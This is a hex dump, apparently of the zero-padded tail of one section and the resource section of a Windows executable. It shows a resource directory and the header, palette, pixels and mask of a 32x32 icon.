0x13143d56:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143d66:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143d76:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143d86:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143d96:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143da6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143db6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143dc6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143dd6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143de6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143df6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143e06:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143e16:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143e26:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143e36:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143e46:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143e56:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143e66:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143e76:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143e86:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143e96:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ea6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143eb6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ec6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ed6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ee6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ef6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143f06:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143f16:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143f26:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143f36:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143f46:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143f56:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143f66:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143f76:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143f86:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143f96:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143fa6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143fb6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143fc6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143fd6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143fe6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13143ff6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13144006:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13144016:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13144026:   00 00 00 00 00 00 ??                               |......?         |
; section: .rsrc
0x13145000:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 02 00   |................|
0x13145010:   03 00 00 00 20 00 00 80  0e 00 00 00 38 00 00 80   |.... .......8...|
0x13145020:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 00   |................|
0x13145030:   01 00 00 00 50 00 00 80  00 00 00 00 00 00 00 00   |....P...........|
0x13145040:   00 00 00 00 00 00 01 00  c8 00 00 00 68 00 00 80   |............h...|
0x13145050:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 00   |................|
0x13145060:   09 04 00 00 80 00 00 00  00 00 00 00 00 00 00 00   |................|
0x13145070:   00 00 00 00 00 00 01 00  09 04 00 00 90 00 00 00   |................|
0x13145080:   a0 50 00 00 a8 08 00 00  00 00 00 00 00 00 00 00   |.P..............|
0x13145090:   48 59 00 00 14 00 00 00  00 00 00 00 00 00 00 00   |HY..............|
0x131450a0:   28 00 00 00 20 00 00 00  40 00 00 00 01 00 08 00   |(... ...@.......|
0x131450b0:   00 00 00 00 00 04 00 00  00 00 00 00 00 00 00 00   |................|
0x131450c0:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 80 00   |................|
0x131450d0:   00 80 00 00 00 80 80 00  80 00 00 00 80 00 80 00   |................|
0x131450e0:   80 80 00 00 c0 c0 c0 00  c0 dc c0 00 f0 ca a6 00   |................|
0x131450f0:   00 20 40 00 00 20 60 00  00 20 80 00 00 20 a0 00   |. @.. `.. ... ..|
0x13145100:   00 20 c0 00 00 20 e0 00  00 40 00 00 00 40 20 00   |. ... ...@...@ .|
0x13145110:   00 40 40 00 00 40 60 00  00 40 80 00 00 40 a0 00   |.@@..@`..@...@..|
0x13145120:   00 40 c0 00 00 40 e0 00  00 60 00 00 00 60 20 00   |.@...@...`...` .|
0x13145130:   00 60 40 00 00 60 60 00  00 60 80 00 00 60 a0 00   |.`@..``..`...`..|
0x13145140:   00 60 c0 00 00 60 e0 00  00 80 00 00 00 80 20 00   |.`...`........ .|
0x13145150:   00 80 40 00 00 80 60 00  00 80 80 00 00 80 a0 00   |..@...`.........|
0x13145160:   00 80 c0 00 00 80 e0 00  00 a0 00 00 00 a0 20 00   |.............. .|
0x13145170:   00 a0 40 00 00 a0 60 00  00 a0 80 00 00 a0 a0 00   |..@...`.........|
0x13145180:   00 a0 c0 00 00 a0 e0 00  00 c0 00 00 00 c0 20 00   |.............. .|
0x13145190:   00 c0 40 00 00 c0 60 00  00 c0 80 00 00 c0 a0 00   |..@...`.........|
0x131451a0:   00 c0 c0 00 00 c0 e0 00  00 e0 00 00 00 e0 20 00   |.............. .|
0x131451b0:   00 e0 40 00 00 e0 60 00  00 e0 80 00 00 e0 a0 00   |..@...`.........|
0x131451c0:   00 e0 c0 00 00 e0 e0 00  40 00 00 00 40 00 20 00   |........@...@. .|
0x131451d0:   40 00 40 00 40 00 60 00  40 00 80 00 40 00 a0 00   |@.@.@.`.@...@...|
0x131451e0:   40 00 c0 00 40 00 e0 00  40 20 00 00 40 20 20 00   |@...@...@ ..@  .|
0x131451f0:   40 20 40 00 40 20 60 00  40 20 80 00 40 20 a0 00   |@ @.@ `.@ ..@ ..|
0x13145200:   40 20 c0 00 40 20 e0 00  40 40 00 00 40 40 20 00   |@ ..@ ..@@..@@ .|
0x13145210:   40 40 40 00 40 40 60 00  40 40 80 00 40 40 a0 00   |@@@.@@`.@@..@@..|
0x13145220:   40 40 c0 00 40 40 e0 00  40 60 00 00 40 60 20 00   |@@..@@..@`..@` .|
0x13145230:   40 60 40 00 40 60 60 00  40 60 80 00 40 60 a0 00   |@`@.@``.@`..@`..|
0x13145240:   40 60 c0 00 40 60 e0 00  40 80 00 00 40 80 20 00   |@`..@`..@...@. .|
0x13145250:   40 80 40 00 40 80 60 00  40 80 80 00 40 80 a0 00   |@.@.@.`.@...@...|
0x13145260:   40 80 c0 00 40 80 e0 00  40 a0 00 00 40 a0 20 00   |@...@...@...@. .|
0x13145270:   40 a0 40 00 40 a0 60 00  40 a0 80 00 40 a0 a0 00   |@.@.@.`.@...@...|
0x13145280:   40 a0 c0 00 40 a0 e0 00  40 c0 00 00 40 c0 20 00   |@...@...@...@. .|
0x13145290:   40 c0 40 00 40 c0 60 00  40 c0 80 00 40 c0 a0 00   |@.@.@.`.@...@...|
0x131452a0:   40 c0 c0 00 40 c0 e0 00  40 e0 00 00 40 e0 20 00   |@...@...@...@. .|
0x131452b0:   40 e0 40 00 40 e0 60 00  40 e0 80 00 40 e0 a0 00   |@.@.@.`.@...@...|
0x131452c0:   40 e0 c0 00 40 e0 e0 00  80 00 00 00 80 00 20 00   |@...@......... .|
0x131452d0:   80 00 40 00 80 00 60 00  80 00 80 00 80 00 a0 00   |..@...`.........|
0x131452e0:   80 00 c0 00 80 00 e0 00  80 20 00 00 80 20 20 00   |......... ...  .|
0x131452f0:   80 20 40 00 80 20 60 00  80 20 80 00 80 20 a0 00   |. @.. `.. ... ..|
0x13145300:   80 20 c0 00 80 20 e0 00  80 40 00 00 80 40 20 00   |. ... ...@...@ .|
0x13145310:   80 40 40 00 80 40 60 00  80 40 80 00 80 40 a0 00   |.@@..@`..@...@..|
0x13145320:   80 40 c0 00 80 40 e0 00  80 60 00 00 80 60 20 00   |.@...@...`...` .|
0x13145330:   80 60 40 00 80 60 60 00  80 60 80 00 80 60 a0 00   |.`@..``..`...`..|
0x13145340:   80 60 c0 00 80 60 e0 00  80 80 00 00 80 80 20 00   |.`...`........ .|
0x13145350:   80 80 40 00 80 80 60 00  80 80 80 00 80 80 a0 00   |..@...`.........|
0x13145360:   80 80 c0 00 80 80 e0 00  80 a0 00 00 80 a0 20 00   |.............. .|
0x13145370:   80 a0 40 00 80 a0 60 00  80 a0 80 00 80 a0 a0 00   |..@...`.........|
0x13145380:   80 a0 c0 00 80 a0 e0 00  80 c0 00 00 80 c0 20 00   |.............. .|
0x13145390:   80 c0 40 00 80 c0 60 00  80 c0 80 00 80 c0 a0 00   |..@...`.........|
0x131453a0:   80 c0 c0 00 80 c0 e0 00  80 e0 00 00 80 e0 20 00   |.............. .|
0x131453b0:   80 e0 40 00 80 e0 60 00  80 e0 80 00 80 e0 a0 00   |..@...`.........|
0x131453c0:   80 e0 c0 00 80 e0 e0 00  c0 00 00 00 c0 00 20 00   |.............. .|
0x131453d0:   c0 00 40 00 c0 00 60 00  c0 00 80 00 c0 00 a0 00   |..@...`.........|
0x131453e0:   c0 00 c0 00 c0 00 e0 00  c0 20 00 00 c0 20 20 00   |......... ...  .|
0x131453f0:   c0 20 40 00 c0 20 60 00  c0 20 80 00 c0 20 a0 00   |. @.. `.. ... ..|
0x13145400:   c0 20 c0 00 c0 20 e0 00  c0 40 00 00 c0 40 20 00   |. ... ...@...@ .|
0x13145410:   c0 40 40 00 c0 40 60 00  c0 40 80 00 c0 40 a0 00   |.@@..@`..@...@..|
0x13145420:   c0 40 c0 00 c0 40 e0 00  c0 60 00 00 c0 60 20 00   |.@...@...`...` .|
0x13145430:   c0 60 40 00 c0 60 60 00  c0 60 80 00 c0 60 a0 00   |.`@..``..`...`..|
0x13145440:   c0 60 c0 00 c0 60 e0 00  c0 80 00 00 c0 80 20 00   |.`...`........ .|
0x13145450:   c0 80 40 00 c0 80 60 00  c0 80 80 00 c0 80 a0 00   |..@...`.........|
0x13145460:   c0 80 c0 00 c0 80 e0 00  c0 a0 00 00 c0 a0 20 00   |.............. .|
0x13145470:   c0 a0 40 00 c0 a0 60 00  c0 a0 80 00 c0 a0 a0 00   |..@...`.........|
0x13145480:   c0 a0 c0 00 c0 a0 e0 00  c0 c0 00 00 c0 c0 20 00   |.............. .|
0x13145490:   c0 c0 40 00 c0 c0 60 00  c0 c0 80 00 c0 c0 a0 00   |..@...`.........|
0x131454a0:   f0 fb ff 00 a4 a0 a0 00  80 80 80 00 00 00 ff 00   |................|
0x131454b0:   00 ff 00 00 00 ff ff 00  ff 00 00 00 ff 00 ff 00   |................|
0x131454c0:   ff ff 00 00 ff ff ff 00  00 00 00 00 00 00 00 00   |................|
0x131454d0:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x131454e0:   00 00 00 00 00 00 00 00  a4 07 07 07 07 07 07 07   |................|
0x131454f0:   07 07 07 07 07 07 07 07  07 07 07 07 07 07 07 00   |................|
0x13145500:   00 00 00 00 00 00 00 00  a4 ff ff ff ff ff ff ff   |................|
0x13145510:   ff ff ff ff ff ff ff ff  ff ff ff ff ff ff 07 00   |................|
0x13145520:   00 00 00 00 00 00 00 00  a4 ff ff ff ff ff ff ff   |................|
0x13145530:   ff ff ff ff ff ff ff ff  ff ff ff ff ff ff 07 00   |................|
0x13145540:   00 00 00 00 00 00 00 00  a4 ff ff ff ff ff ff ff   |................|
0x13145550:   ff ff ff ff ff ff ff ff  ff ff ff ff ff ff 07 00   |................|
0x13145560:   00 00 00 00 00 00 00 00  a4 ff ff ff ff ff ff ff   |................|
0x13145570:   ff ff ff ff ff ff ff ff  ff ff ff ff ff ff 07 00   |................|
0x13145580:   00 00 00 00 00 00 00 00  a4 ff ff ff ff ff ff ff   |................|
0x13145590:   ff ff ff ff ff ff ff ff  ff ff ff ff ff ff 07 00   |................|
0x131455a0:   00 00 00 00 00 00 00 00  a4 ff ff ff 00 00 00 ff   |................|
0x131455b0:   ff ff 00 00 00 ff ff ff  00 00 00 00 ff ff 07 00   |................|
0x131455c0:   00 00 00 00 00 00 00 00  a4 ff ff ff 03 07 03 00   |................|
0x131455d0:   00 00 fb 07 fb 00 00 00  03 07 03 00 ff ff 07 00   |................|
0x131455e0:   00 00 00 00 00 00 00 00  a4 ff ff ff 03 fb 07 fb   |................|
0x131455f0:   07 fb 07 fb 07 fb 07 fb  07 fb 03 00 ff ff 07 00   |................|
0x13145600:   00 00 00 00 00 00 00 00  a4 ff ff ff ff 03 fb 07   |................|
0x13145610:   03 03 03 03 03 03 03 03  fb 03 00 ff ff ff 07 00   |................|
0x13145620:   00 00 00 00 00 00 00 00  a4 ff ff ff ff ff 03 fb   |................|
0x13145630:   00 ff ff ff ff ff ff 03  07 00 ff ff ff ff 07 00   |................|
0x13145640:   00 00 00 00 00 00 00 00  a4 ff ff ff ff ff 03 07   |................|
0x13145650:   00 f9 ff ff ff ff ff 03  fb 00 ff ff ff ff 07 00   |................|
0x13145660:   00 00 00 00 00 00 00 00  a4 ff ff ff ff 03 03 fb   |................|
0x13145670:   00 f9 f9 00 00 00 00 00  00 03 00 ff ff ff 07 00   |................|
0x13145680:   00 00 00 00 00 00 00 00  a4 ff ff ff ff 03 fb 07   |................|
0x13145690:   00 f9 00 01 01 07 07 00  00 00 00 ff ff ff 07 00   |................|
0x131456a0:   00 00 00 00 00 00 00 00  a4 ff ff ff ff 03 03 fb   |................|
0x131456b0:   00 f9 f9 f9 f9 01 ff 07  00 00 00 ff ff ff 07 00   |................|
0x131456c0:   00 00 00 00 00 00 00 00  a4 ff ff ff ff ff 03 07   |................|
0x131456d0:   00 f9 f9 f9 f9 f9 01 a4  a4 00 00 ff ff ff 07 00   |................|
0x131456e0:   00 00 00 00 00 00 00 00  a4 ff ff ff ff ff 03 fb   |................|
0x131456f0:   00 f9 f9 f9 f9 f9 f9 03  a4 ff fb 00 ff ff 07 00   |................|
0x13145700:   00 00 00 00 00 00 00 00  a4 ff ff ff ff 03 fb 07   |................|
0x13145710:   00 f9 f9 f9 f9 f9 f9 03  fb a4 ff fb 00 00 07 00   |................|
0x13145720:   00 00 00 00 00 00 00 00  a4 ff ff ff 03 03 07 fb   |................|
0x13145730:   00 00 00 00 00 00 00 03  07 03 a4 ff fc 04 00 00   |................|
0x13145740:   00 00 00 00 00 00 00 00  a4 ff ff ff 03 07 fb 07   |................|
0x13145750:   fb 07 fb 07 fb 07 fb 07  fb 07 03 04 fe fc fc 00   |................|
0x13145760:   00 00 00 00 00 00 00 00  a4 ff ff ff 03 fb 03 03   |................|
0x13145770:   03 03 03 fb 03 03 03 03  03 fb 03 00 04 fe fc fc   |................|
0x13145780:   00 00 00 00 00 00 00 00  a4 ff ff ff 03 03 03 ff   |................|
0x13145790:   ff ff 03 03 03 ff ff ff  03 03 03 00 ff 04 fe fc   |................|
0x131457a0:   fc 00 00 00 00 00 00 00  a4 ff ff ff ff ff ff ff   |................|
0x131457b0:   ff ff ff ff ff ff ff ff  ff ff ff ff ff ff 04 fe   |................|
0x131457c0:   fc fc 00 00 00 00 00 00  a4 ff ff ff ff ff ff ff   |................|
0x131457d0:   ff ff ff ff ff ff ff ff  ff ff ff ff ff ff 07 04   |................|
0x131457e0:   fe fc fc 00 00 00 00 00  a4 ff ff ff ff ff ff ff   |................|
0x131457f0:   ff ff ff ff ff ff ff ff  ff a4 00 00 00 00 00 00   |................|
0x13145800:   04 fe fc fc 00 00 00 00  a4 ff ff ff ff ff ff ff   |................|
0x13145810:   ff ff ff ff ff ff ff ff  ff a4 ff ff 07 a4 00 00   |................|
0x13145820:   00 04 fe fc fc 00 00 00  a4 ff ff ff ff ff ff ff   |................|
0x13145830:   ff ff ff ff ff ff ff ff  ff a4 ff 07 a4 00 00 00   |................|
0x13145840:   00 00 04 fe fc fc 00 00  a4 ff ff ff ff ff ff ff   |................|
0x13145850:   ff ff ff ff ff ff ff ff  ff a4 07 a4 00 00 00 00   |................|
0x13145860:   00 00 00 04 fe fc fc 00  a4 ff ff ff ff ff ff ff   |................|
0x13145870:   ff ff ff ff ff ff ff ff  ff a4 a4 00 00 00 00 00   |................|
0x13145880:   00 00 00 00 04 fe fc 00  a4 ff ff ff ff ff ff ff   |................|
0x13145890:   ff ff ff ff ff ff ff ff  ff a4 00 00 00 00 00 00   |................|
0x131458a0:   00 00 00 00 00 04 04 00  a4 a4 a4 a4 a4 a4 a4 a4   |................|
0x131458b0:   a4 a4 a4 a4 a4 a4 a4 a4  a4 a4 00 00 00 00 00 00   |................|
0x131458c0:   00 00 00 00 00 00 00 00  00 00 00 ff 00 00 00 ff   |................|
0x131458d0:   00 00 00 ff 00 00 00 ff  00 00 00 ff 00 00 00 ff   |................|
0x131458e0:   00 00 00 ff 00 00 00 ff  00 00 00 ff 00 00 00 ff   |................|
0x131458f0:   00 00 00 ff 00 00 00 ff  00 00 00 ff 00 00 00 ff   |................|
0x13145900:   00 00 00 ff 00 00 00 ff  00 00 00 ff 00 00 00 ff   |................|
0x13145910:   00 00 00 ff 00 00 00 ff  00 00 00 ff 00 00 00 7f   |................|
0x13145920:   00 00 00 3f 00 00 00 1f  00 00 00 0f 00 00 00 07   |...?............|
0x13145930:   00 00 01 83 00 00 03 c1  00 00 07 e0 00 00 0f f0   |................|
0x13145940:   00 00 1f f8 00 00 3f ff  00 00 01 00 01 00 20 20   |......?.......  |
0x13145950:   08 00 01 00 08 00 a8 08  00 00 01 00 00 00 00 00   |................|
0x13145960:   ??                                                 |?               |
